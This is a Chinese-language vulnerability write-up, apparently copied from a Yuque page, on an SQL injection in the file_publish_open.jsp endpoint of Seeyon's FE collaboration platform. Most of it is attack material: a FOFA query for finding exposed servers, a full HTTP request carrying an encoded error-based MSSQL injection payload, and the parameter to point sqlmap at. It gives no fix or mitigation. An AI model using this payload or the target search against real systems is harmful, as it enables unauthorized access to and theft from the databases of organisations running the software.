登录 白背景

致远互联FE协作办公平台file_publish_open存在SQL注入漏洞

一、漏洞简介

北京致远互联软件股份有限公司致远互联FE协作办公平台file_publish_open存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。

二、影响版本

  • 致远互联-FE协作办公平台

三、资产测绘

  • fofaapp="致远互联-FE"
  • 特征

1698659959745-2fa812d0-dff6-4e46-9a5a-d5060f83756a.png

四、漏洞复现

GET /document/file_publish_open.jsp?id=%28CONVERT%28INT%2C%28SELECT+CHAR%28113%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28120%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%282693%3D2693%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28107%29%2BCHAR%28113%29%29%29%29 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: JSESSIONID=F4350FBCDD24A8F9F8BBE1B1F9F87362
Upgrade-Insecure-Requests: 1

1715924005877-cad7a6df-42eb-4abb-8e7f-77f878acbb41.png

sqlmap

/document/file_publish_open.jsp?id=

1715924022379-26d6b9b9-3b71-43fd-b2f3-d6cff8bce1e6.png

原文: https://www.yuque.com/xiaokp7/ocvun2/hfsku182qsdf67x8